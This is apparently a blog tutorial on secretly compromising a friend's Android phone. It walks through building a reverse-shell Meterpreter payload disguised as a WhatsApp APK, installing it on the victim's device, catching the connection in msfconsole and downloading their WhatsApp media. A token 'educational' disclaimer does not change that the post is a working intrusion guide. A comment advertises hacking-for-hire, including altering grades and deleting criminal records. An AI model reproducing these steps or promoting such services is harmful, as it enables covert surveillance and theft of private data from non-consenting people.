Hackers can use a WhatsApp video call to hack your phone - TechEngage

Hello Guys lot of you were asking about me to make a tutorial about WhatsApp  Hacking 

Today I will show you how you will be able to hack your Friends WhatsApp account and access his/her private information. 

To complete this hacking we will be using Kali Linux operating system. If you don't know How to use Kali Linux you can Purchase The Complete kali linux course form here or just contacting with me. 

[Note: I am not promoting any kind of hacking activity. This is an awareness post so that everyone can be safe from this kind of activity. I'll not be responsible for anything wrong. It's only for educational & learning purpose]

First we will make a payload 

To do so type the exact same command as I do 


msfvenom -p android/meterpreter/reverse_tcp lhost=(YOUR IP) lport=(YOUR PORT NUMBER) R > whatsapp.apk

Note that I am Using Meterpreter to create this Payload 


To create a payload, you first have to type a few commands that you will find in the section of the command and you have also shown in the photo here in the L host you have to enter the IP of your

machine and in the L port you can enter any port number can give.


After inserting the commands, your payload will be created and you will see some such interface inside

which you have been told that what is the size of your payload.

Now we have to put the payload in our friend’s phone and install it. After installing the payload you have to open it.


After this, to control the payload in your machine you have to open a tool named (msfconsole) from

which you can control your payload. As you type the name of the clan in your terminal, your tool will start

msfconsole

to open as you can see in my photo.


Now It's time to Fill the Payload Info

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp

You can see that my tool has opened, now I have to connect my payload with its toll, for which the command command will be found in the comment section.


set lhost (YOUR IP)
exploit

Here you have to enter the IP of your machine in the L host and then write the exploit command and

press the enter button and you can see that my tool has started and is ready to connect with the payload.



Now you can see that my tool is connected with the payload. If you do not connect with the payload, then you have to open the payload once again. And then some type of interface will open in front of you.

Now Follow this command to access phone Root Folder



cd /
ls -l

Here you have been connected to the phone, now you have to take the data of his WhatsApp from his

phone, for which first you have to go to the root files of his phone, whose command is given in the

comment section.


cd sdcard
ls -l


After coming here, you have to go to its SD card where the data of every application is saved, whose commands will also be found in the comment section.



After coming to the SD card, you will see the interface of some such applications where all the applications installed in his phone will be visible to everyone.

Now Go to WhatsApp Folder


cd WhatsApp
ls -l

By the way, you have to go to the folder with WhatsApp and take the data from there, whose

command will be found in the comment section.



cd Media
ls -l

After coming inside WhatsApp, you will have some such files open in front of you, where you have to

go to the media folder.



After coming to the media folder, your friend’s WhatsApp data will open in front of you, now you can download anything from here.



cd WhatsApp \ Images
ls -l


Like I will go to the image folder and download an image and show you the commands you will find

above.



download (YOUR FILE NAME)


After the image is in the folder, you have to write the name of the file you want to download after the

download and press the enter button and you can see that my file has been downloaded. Then you can see what you want.

Using this method you can download media, documents, etc.

To see chats you need to download databases of your victim, i will make another tutorial for this. I hope you learn something in this tutorial

1 Comments


  1. If you ever want to change or up your university grades contact cybergolden hacker he'll get it done and show a proof of work done before payment. He's efficient, reliable and affordable. He can also perform all sorts of hacks including text, whatsapp, password decrypt,hack any mobile phone, Escape Bancruptcy, Delete Criminal Records and the rest

    Email: cybergoldenhacker at gmail dot com

    ReplyDelete

Post a Comment

Previous Post Next Post